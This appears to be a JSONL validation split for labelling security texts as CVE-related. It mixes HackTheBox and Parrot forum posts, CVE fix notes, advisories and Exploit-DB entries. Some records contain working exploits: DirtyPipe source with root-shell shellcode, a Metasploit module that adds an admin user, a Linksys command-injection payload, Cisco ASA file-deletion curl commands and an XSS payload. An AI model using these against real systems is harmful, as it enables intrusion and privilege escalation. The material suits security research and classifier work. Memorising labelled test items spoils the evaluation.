+{"id": "54b2f5b53037e90da20f", "text": "Learning paths on reputable services are a good way. want more guidance? Start with tryhackme.com want a little less guidance and more self-sufficiency? Academy.hackthebox.com is a place to go. want to learn using the “sink or swim” method? Overthewire.org awaits you.", "source": "parrotsec", "timestamp": "2022-04-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "bbd33bb0dd020901e3a6", "text": "Supplementary details: Observe each parameter mentioned in “ Login Form Attacks” in combination with “ Login Form Attacks”… (At least that’s how I passed…Mentality will affect thinking, so please be patient!)", "source": "hackthebox", "timestamp": "2022-04-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "37344bf57a7bca7ad3fa", "text": "CVE: CVE-2022-29203\n\n[{'lang': 'en', 'value': 'TensorFlow is an open source platform for machine learning. Prior to versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4, the implementation of `tf.raw_ops.SpaceToBatchND` (in all backends such as XLA and handwritten kernels) is vulnerable to an integer overflow: The result of this integer overflow is used to allocate the output tensor, hence we get a denial of service via a `CHECK`-failure (assertion failure), as in TFSA-2021-198. Versions 2.9.0, 2.8.1, 2.7.2, and 2.6.4 contain a patch for this issue.'}]\n\nFix commit: Fix security vulnerability with SpaceToBatchNDOp.\n\nPiperOrigin-RevId: 445527615", "source": "cvefixes", "timestamp": "2022-05-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "9d31ca5a6f648dbbf7a9", "text": "CVE: CVE-2022-27815\n\n[{'lang': 'en', 'value': 'SWHKD 1.1.5 unsafely uses the /tmp/swhkd.pid pathname. There can be an information leak or denial of service.'}]\n\nFix commit: [patch] CVE-2022-27815", "source": "cvefixes", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ccddd70acf979640ce8c", "text": "can you help me in the digging in part and going depper part", "source": "hackthebox", "timestamp": "2023-02-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e2c8f831b65b2ce2aa27", "text": "Hi @SwordFish Have you tried installing linux-perf? sudo apt install linux-perf There appears to be two versions based on Linux kernel version (i.e. linux-perf_5.10.162-1 , linux-perf_6.0.12-1parrot1_amd64.deb )", "source": "parrotsec", "timestamp": "2023-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "e1ee7e0fb365f5f332cf", "text": "A journal to detect hidden processes on Linux\n\nOpen process blah blah… rootkit and hidden processes blah blah… Skipped to the point: There are some mechanics to detect hidden processes on Linux system. 1 of them is checking procfs . Technical information: You can’t see the process information when use ps You can’t see procfs folder when do ls /proc/ You CAN cd procfs and read data inside the folder because it’s available This method is easy to program (it took me 1 hour to create a script. I spent 30 mins to detect a bug that i defined wrong value for a variable). There are some projects can do that: unhide : written in C (mostly?), available on repository. Do sudo apt install unhide A project written in Golang, article about it Linux Stealth Rootkit Process Decloaking Tool – sandfly-processdecloak . Link to source code: GitHub - sandflysecurity/sandfly-processdecloak: Sandfly Linux Stealth Rootkit Decloaking Utility Testing with Diamorphine rootkit Some basic commands to use this rootkit Expose hiding processes - Learning Wazuh · Wazuh documentation Rootkit source code (compiled okay on Parrot with kernel 6.0): GitHub - m0nad/Diamorphine: LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64) Skipped the build and infect system step The test process is 1161 which is mate-terminal . We can see the process in both ps and ls /proc/ | grep 1161 image 814×299 65 KB Tell rootkit to hide the process, system can’t see it image 809×238 72.2 KB However, listing directory is fine image 744×316 88.1 KB Run simple check with the sandfly-processdecloak , it took about 16 sec to do complete check. image 665×298 80.5 KB Test with unhide-linux . Problems: It requires root permission (dont trust this screenshot. I told the rootkit to give current user root permission) False positive High CPU usage. The whole system was laggy when it ran Slow (it took 21 secs) image 704×490 87.1 KB image 756×493 89.4 KB My tool, which is ported (I stole the code) of processuncloak src/tools/unhide_procs.nim · main · Nong Hoang Tu / rkcheck · GitLab Downloaded script inside VM (name’s test) It took < 5 secs to complete check. The whole source code has 64 lines and very easy to read (my code syntax is bad though)", "source": "parrotsec", "timestamp": "2022-11-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "59229a6063bfd96dd2de", "text": "Linksys AX3200 V1.1.00 - Command Injection\n\n# Exploit Title: Linksys AX3200 V1.1.00 - Command Injection\n# Date: 2022-09-19\n# Exploit Author: Ahmed Alroky\n# Author: Linksys\n# Version: 1.1.00\n# Authentication Required: YES\n# CVE : CVE-2022-38841\n\n# Tested on: Windows\n\n# Proof Of Concept:\n\n1 - login into AX3200 webui\n2 - go to diagnostics page\n3 - put \"google.com|ls\" to perform a traceroute\n4 - you will get the file list and also you can try \"example.com|id\" to ensure that all commands executed as a root user", "source": "exploitdb", "timestamp": "2023-03-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "b8f758d378ffeba35df6", "text": "Hi @Famous_Hacker you can learn and test skills on https://academy.hackthebox.com/ (very interactive learning) also check google crash courses…", "source": "parrotsec", "timestamp": "2022-03-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "852928a4a7052aab885d", "text": "baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability \n\n[Severity: MEDIUM]\n\nThere is a cross-site scripting vulnerability on the management system of baserCMS.\n\nThis is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.\nIf you are eligible, please update to the new version as soon as possible.\n\n### Target\nbaserCMS 4.7.1 and earlier versions.\n\n### Vulnerability\nExecution of malicious JavaScript code may alter the display of the page or leak cookie information.\n- In Favorite registration (CVE-2022-39325)\n- In Permission Settings (CVE-2022-41994)\n- In User group management (CVE-2022-42486)\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\n### Credits\n- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.\n- YUYA KOTAKE@CARTA HOLDINGS, INC.", "source": "github_advisory", "timestamp": "2022-11-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fed4cb870b5dad1bec2c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-0979, CVE-2018-0980, CVE-2018-0990, CVE-2018-0993, CVE-2018-0994, CVE-2018-0995.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "da9bde3ee3c0aadfe87c", "text": "Could someone please give me a nudge on bypass authentication? I’ve tried everything I know, and all sorts of tools… Edit: NVM I got it", "source": "hackthebox", "timestamp": "2023-09-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "d22c4ce6df0ec1f83e7f", "text": "I was beating my head against the wall with this challenge and trying desperately not to over think it. This single line right here helped me so much because I wasn’t seeing what I expected through gdb. Thank you! 5- remember when you are inside gdb and run \" $(python -c blablabla)\" it’s the same as executing the script with the parameter, as follows: ‘./script $(python -c blablabla)’ I will also note, this chapter shows you one way of using msfvenom with its build up to the challenge. There are many tools in msfvenom’s tool suite!", "source": "hackthebox", "timestamp": "2023-01-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "cb191eeef4e2a322b0f4", "text": "CVE: CVE-2022-24750\n\n[{'lang': 'en', 'value': 'UltraVNC is a free and open source remote pc access software. A vulnerability has been found in versions prior to 1.3.8.0 in which the DSM plugin module, which allows a local authenticated user to achieve local privilege escalation (LPE) on a vulnerable system. The vulnerability has been fixed to allow loading of plugins from the installed directory. Affected users should upgrade their UltraVNC to 1.3.8.0. Users unable to upgrade should not install and run UltraVNC server as a service. It is advisable to create a scheduled task on a low privilege account to launch WinVNC.exe instead. There are no known workarounds if wincnc needs to be started as a service.'}]\n\nFix commit: security fix", "source": "cvefixes", "timestamp": "2022-03-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "954093f4ad0121ae4429", "text": "CVE: CVE-2022-29859\n\n[{'lang': 'en', 'value': 'component/common/network/dhcp/dhcps.c in ambiot amb1_sdk (aka SDK for Ameba1) before 2022-03-11 mishandles data structures for DHCP packet data.'}]\n\nFix commit: [dhcps] update dhcps", "source": "cvefixes", "timestamp": "2022-04-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "53c0a206d3581b3805a1", "text": "Upgrading doesn't prevent exploiting vulnerable XWiki documents\n\n[Severity: CRITICAL]\n\n### Impact\n\nWhen an XWiki installation is upgraded and that upgrade contains a fix for a bug in a document, just a new version of that document is added. In some cases, it's still possible to exploit the vulnerability that was fixed in the new version. The severity of this depends on the fixed vulnerability, for the purpose of this advisory take [CVE-2022-36100](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2g5c-228j-p52x) as example - it is easily exploitable with just view rights and critical. When XWiki is upgraded from a version before the fix for it (e.g., 14.3) to a version including the fix (e.g., 14.4), the vulnerability can still be reproduced by adding `rev=1.1` to the URL used in the reproduction steps so remote code execution is possible even after upgrading. Therefore, this affects the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability also affects manually added script macros that contained security vulnerabilities that were later fixed by changing the script macro without deleting the versions with the security vulnerability from the history.\n\nThis vulnerability doesn't affect freshly installed versions of XWiki. Further, this vulnerability doesn't affect content that is only loaded from the current version of a document like the code of wiki macros or UI extensions.\n\n### Patches\n\nThis vulnerability has been patched in XWiki 14.10.7 and 15.2RC1 by forcing old revisions to be executed in a restricted mode that disables all script macros.\n\n### Workarounds\n\nAs a workaround, admins can manually delete old revisions of affected documents. A script could be used to identify all installed documents and delete the history for them. However, also manually added and later corrected code may be affected by this vulnerability so it is easy to miss documents.\n\n### References\n\n* https://jira.xwiki.org/browse/XWIKI-20594\n* https://github.com/xwiki/xwiki-platform/commit/15a6f845d8206b0ae97f37aa092ca43d4f9d6e59", "source": "github_advisory", "timestamp": "2023-06-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "af057325fdda54ee8957", "text": "from here you can get the idea d-tech-educate this site will help you to solve the issue", "source": "go4expert", "timestamp": "2023-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "1f922115ac5955f94601", "text": "Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)\n\n// Exploit Title: Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)\n// Exploit Author: blasty (peter@haxx.in)\n// Original Author: Max Kellermann (max.kellermann@ionos.com)\n// CVE: CVE-2022-0847\n\n/* SPDX-License-Identifier: GPL-2.0 */\n/*\n * Copyright 2022 CM4all GmbH / IONOS SE\n *\n * author: Max Kellermann \n *\n * Proof-of-concept exploit for the Dirty Pipe\n * vulnerability (CVE-2022-0847) caused by an uninitialized\n * \"pipe_buffer.flags\" variable. It demonstrates how to overwrite any\n * file contents in the page cache, even if the file is not permitted\n * to be written, immutable or on a read-only mount.\n *\n * This exploit requires Linux 5.8 or later; the code path was made\n * reachable by commit f6dd975583bd (\"pipe: merge\n * anon_pipe_buf*_ops\"). The commit did not introduce the bug, it was\n * there before, it just provided an easy way to exploit it.\n *\n * There are two major limitations of this exploit: the offset cannot\n * be on a page boundary (it needs to write one byte before the offset\n * to add a reference to this page to the pipe), and the write cannot\n * cross a page boundary.\n *\n * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\\nssh-ed25519 AAA......\\n'\n *\n * Further explanation: https://dirtypipe.cm4all.com/\n */\n\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 4096\n#endif\n\n// small (linux x86_64) ELF file matroshka doll that does;\n// fd = open(\"/tmp/sh\", O_WRONLY | O_CREAT | O_TRUNC);\n// write(fd, elfcode, elfcode_len)\n// chmod(\"/tmp/sh\", 04755)\n// close(fd);\n// exit(0);\n//\n// the dropped ELF simply does:\n// setuid(0);\n// setgid(0);\n// execve(\"/bin/sh\", [\"/bin/sh\", NULL], [NULL]);\nunsigned char elfcode[] = {\n\t/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,\n\t0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,\n\t0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,\n\t0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,\n\t0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,\n\t0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,\n\t0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,\n\t0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,\n\t0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,\n\t0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,\n\t0x00, 0x00, 0x", "source": "exploitdb", "timestamp": "2022-03-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "4fbbe62ff32af62df370", "text": "Guys, does anybody know why “character shifting” technique for “&” doesn’t work here? It accepts %26, but $(tr%09’!-}‘%09’\"-~'<<<%) results in an error.", "source": "hackthebox", "timestamp": "2023-04-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ff5f384b2df36e0d3296", "text": "Parrot Devs will never call you, be aware of pfishers and snoopers\n\nIf there is a number associated to your mail, they have your telephone number. Apparently this site show your email as well or is badly protected. Never answer an unknown caller with the mail associated here. In contrast you can use a telephone number to attract potential attackers and use WireShark logs.", "source": "parrotsec", "timestamp": "2023-11-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f110638667d61ff37968", "text": "So I ran the shell code and got something back, but it’s not the right answer, even though it looks like the right answer given the ‘format’. Can someone who figured this out PM me so I can confirm if I’ve got the right output? If not can you tell me how to get the right output?", "source": "hackthebox", "timestamp": "2022-11-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "492233178f8bcc06025a", "text": "Servisnet Tessa - Privilege Escalation (Metasploit)\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Servisnet Tessa - Privilege Escalation (Metasploit)',\n 'Description' => %q(\n This module exploits privilege escalation in Servisnet Tessa, triggered by add new sysadmin user with any user authorization .\n\t\tAn API request to \"/data-service/users/[userid]\" with any low-authority user returns other users' information in response.\n The encrypted password information is included here, but privilage escelation is possible with the active sessionid value.\n\n var token = Buffer.from(`${user.username}:${user.usersessionid}`, 'utf8').toString('base64');\n\n The logic required for the Authorization header is as above.\n Therefore, after accessing an authorized user ID value and active sessionId value,\n if the username and sessionId values are encoded with base64, a valid Token will be obtained and a new admin user can be added.\n\n ),\n 'References' =>\n [\n [ 'CVE', 'CVE-2022-22832' ],\n [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Privilege-Escalation.html' ],\n [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]\n ],\n 'Author' =>\n [\n 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Dec 22 2021\",\n 'DefaultOptions' =>\n {\n 'RPORT' => 443,\n 'SSL' => true\n }\n ))\n\n register_options([\n\tOptString.new('USERNAME', [true, 'Servisnet Username']),\n OptString.new('PASSWORD', [true, 'Servisnet Password']),\n OptString.new('TARGETURI', [true, 'Base path for application', '/'])\n ])\n end\n # split strings to salt\n def split(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n # split JSONs to salt\n def splitJSON(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\":\"([\\S\\s]*?)\"/)\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n # split JSONs to salt none \"\n def splitJSON2(data, string_to_split)\n word = data.scan(/\"#{string_to_split}\":([\\S\\s]*?),/)[0]\n string = word.split('\"]').join('').split('[\"').join('')\n return string\n end\n\n def app_path\n res = send_request_cgi({\n # default.a.get( check\n 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),\n\t 'method' => 'GET'\n })\n\n if res && res.code == 200 && res.body =~ /baseURL/\n data = res.body\n #word = data.scan(/\"#{string_to_split}\"\\] = \"([\\S\\s]*?)\"/)\n base_url = data.scan(/baseURL: '\\/([\\S\\s]*?)'/)[0]\n return base_url\n else\n fail_with(Failure::NotVulnerable, 'baseURL not found!')\n end\n end\n\n def add_user(token, app_path)\n newuser = Rex::Text.rand_text_alpha_lower(8)\n id = Rex::Text.rand_text_numeric(4)\n # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111\n json_data = '{\"alarm_request\": 1, \"city_id\": null, \"city_name\": null, \"decryptPassword\": null, \"email\": \"' + newuser + '@localhost.local\", \"id\": ' + id + ', \"invisible\": 0, \"isactive\": 1, \"isblocked\": 0, \"levelstatus\": 1, \"local_authorization\": 1, \"mail_request\": 1, \"name\": \"' + newuser + '\", \"password\": \"hxZ8I33nmy9PZNhYhms/Dg==\", \"phone\": null, \"position\": null, \"region_name\": \"test4\", \"regional_id\": 0, \"role_id\": 1, \"role_name\": \"Sistem Admin\", \"rolelevel\": 3, \"status\": null, \"surname\": \"' + newuser + '\", \"totalRecords\": null, \"try_pass_right\": 0, \"userip\": null, \"username\": \"' + newuser + '\", \"userType\": \"Lokal Kullanıcı\"}'\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n ", "source": "exploitdb", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "34682a4c9281637984aa", "text": "CVE: CVE-2022-21710\n\n[{'lang': 'en', 'value': 'ShortDescription is a MediaWiki extension that provides local short description support. A cross-site scripting (XSS) vulnerability exists in versions prior to 2.3.4. On a wiki that has the ShortDescription enabled, XSS can be triggered on any page or the page with the action=info parameter, which displays the shortdesc property. This is achieved using the wikitext `{{SHORTDESC:<img src=x onerror=alert()>}}`. This issue has a patch in version 2.3.4.'}]\n\nFix commit: build: bump version to 2.3.4", "source": "cvefixes", "timestamp": "2022-01-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "a7735d47190460fd9f16", "text": "Hauutiwwx: Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box Oh no you didnt Im sort of frustrated, as the guidelines are very clear. Upload without RDPing. RDP after you uploaded.", "source": "hackthebox", "timestamp": "2022-05-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "44ae751d6e321760b3ae", "text": "CVE: CVE-2022-34134\n\n[{'lang': 'en', 'value': 'Benjamin BALET Jorani v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /application/controllers/Users.php.'}]\n\nFix commit: BF:security on users mgt with CSRF token fix #369", "source": "cvefixes", "timestamp": "2022-06-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1a66fb0c39d2e49e6ded", "text": "i just logged to say Thank You for this! Every learn path looks great and actually i start with MA, lucky that i back here for a while! I hope project will survive and grow. OST2 is related somehow to Parrot OS? or it’s just learning source you recommend? Happy New Year btw. and good luck with your rkcheck project!", "source": "parrotsec", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "99dbd4d8d9d5c440ba54", "text": "Other than controlling the drone via keyboard, not much. I’ve been stuck on decoding the video for weeks haha. Seems like the App is using Ffmpeg, AVPlayer, EglView, Opencv, CNN, and etc. Idk if it’s helping. I’ve read many articles about “hacking” bunch of drone. And their way of accesing the video stream so simple. Idk why it’s hard in this case haha. I thought that the drone is encapsulating the stream using something like RTP but after testing, the packet send using RTP doesn’t match what the drone have sent. Now i’m stuck. Still researching sending video over udp tho, will reply when i’ve found the solution.", "source": "hackthebox", "timestamp": "2023-11-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "736c5e458cf51b4097f9", "text": "CVE: CVE-2022-2128\n\n[{'lang': 'en', 'value': 'Unrestricted Upload of File with Dangerous Type in GitHub repository polonel/trudesk prior to 1.2.4.'}]\n\nFix commit: fix(attachments): file type security fix", "source": "cvefixes", "timestamp": "2022-06-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0901dc0853491ab78033", "text": "CVE: CVE-2022-1553\n\n[{'lang': 'en', 'value': 'Leaking password protected articles content due to improper access control in GitHub repository publify/publify prior to 9.2.8. Attackers can leverage this vulnerability to view the contents of any password-protected article present on the publify website, compromising confidentiality and integrity of users.'}]\n\nFix commit: Do not create article meta description for password-protected articles", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "f69d9ea1de9a44b029b6", "text": "Its a funny answer, but the way I found it was \" Get-Alias | findstr ipconfig \" Answer: ifconfig", "source": "hackthebox", "timestamp": "2022-08-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "f29e2b1879677fd5c0a3", "text": "i was in the same situation, try to read /etc/passwd/ properly, the name is there", "source": "hackthebox", "timestamp": "2022-05-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "267ea1f98f24d5ad35c2", "text": "Symfony Denial of Service Via Long Password Hashing\n\n[Severity: MEDIUM]\n\nThe Security component in Symfony 2.0.x before 2.0.25, 2.1.x before 2.1.13, 2.2.x before 2.2.9, and 2.3.x before 2.3.6 allows remote attackers to cause a denial of service (CPU consumption) via a long password that triggers an expensive hash computation, as demonstrated by a PBKDF2 computation, a similar issue to CVE-2013-5750.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c43f528da94ad425fb6d", "text": "CVE: CVE-2022-0351\n\n[{'lang': 'en', 'value': 'Access of Memory Location Before Start of Buffer in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.4206: condition with many \"(\" causes a crash\n\nProblem: Condition with many \"(\" causes a crash.\nSolution: Limit recursion to 1000.", "source": "cvefixes", "timestamp": "2022-01-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "31ec00bb4f907cdc00c6", "text": "For those who have been like me and have been stuck on this question for ages, not being able to get the correct password list to use here are some clues, hopefully these are helpful: The brute forcing should not take long at all You only need to input the characters first name into the password generator (cupp) Try ticking the option to using special characters at the end of words Use Leet mode Dont forget to filter the password list for passwords that match the password policy Hopefully this help", "source": "hackthebox", "timestamp": "2022-01-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "ed21e03111886410da20", "text": "Android 8 devices and onwards this is quite expected. That ‘attack’ only works on Android 7 or earlier from memory, for a ‘proof of concept’ you can run an Android VM on virtual box or vmware etc, the earlier vulnerable Android version, and then see the exploit in action.", "source": "parrotsec", "timestamp": "2023-03-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "b5679a1920e087dac4fc", "text": "I figured it out) Brought it to full screen and saw an icon in the lower right corner. It was not displayed in normal mode.( HTB Academy 277×174 38.6 KB That’s just through pwnbox, the error is the same as on my VM, unfortunately. What am I doing wrong? The advice was to run the script on pwnbox. strangely error_HTB Academy 758×387 143 KB", "source": "hackthebox", "timestamp": "2022-06-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "64423f066434566b83b9", "text": "[Path Traversal] CVE-2020-3187 - Unauthenticated Arbitrary File Deletion\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences.\n\nThe IP has a SSL certificate pointing to .█████\ncurl -kv https://█████████/\n\noutput\n```\nServer certificate:\n* subject: █████████.mil\n```\n\n## Impact\n\nAn exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3187\n\n## Steps to Reproduce\n1.First I performed a curl request to validate that /session_password.html gave a 200 response.\ncurl -k -s -i https://███/+CSCOE+/session_password.html\n2.Example to delete logo file \"/+CSCOU+/csco_logo.gif\".\ncurl -k -H \"Cookie: token=../+CSCOU+/csco_logo.gif\" https://██████/+CSCOE+/session_password.html\n\n_NOTE: No destructive behavior was performed on target, the above command will remove csco_logo.gif and can be restored on reboot of the device_\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43", "source": "hackerone", "timestamp": "2022-05-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c736a15d82e9ff55e3e0", "text": "Thanks @htbperson The 3rd point is where all of us get stuck. Be sure to make the ipaddress the ip address of “tun0” not anything else.", "source": "hackthebox", "timestamp": "2023-12-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c7a8804410135c667328", "text": "CVE: CVE-2022-2862\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.0221.'}]\n\nFix commit: patch 9.0.0221: accessing freed memory if compiling nested function fails\n\nProblem: Accessing freed memory if compiling nested function fails.\nSolution: Mess up the variable name so that it won't be found.", "source": "cvefixes", "timestamp": "2022-08-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c1e65eb13e6b2ec8f8f9", "text": "NFORMATION GATHERING - Virtual Hosts\n\nHi! I am stuck for a few days now, and I’m don’t know what I’m doing wrong. The question is: Enumerate the target and find a vHost that contains flag No. 1. Submit the flag value as your answer (in the format HTB{DATA}). When I’m doing FFUF on it, and want to go to for example blog.inlanefreight.htb than everything is the same webpage. The webpage from the Ubuntu Apache page. When i go to HTTP://inlanefreight.htb than I got a flag 1, but when I fill it in, it said that it isn’t the write answer. I added the findings from FFUF to /etc/hosts/ with the given target-ip. Can anyone tell me what I’m doing wrong, please?", "source": "hackthebox", "timestamp": "2022-07-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
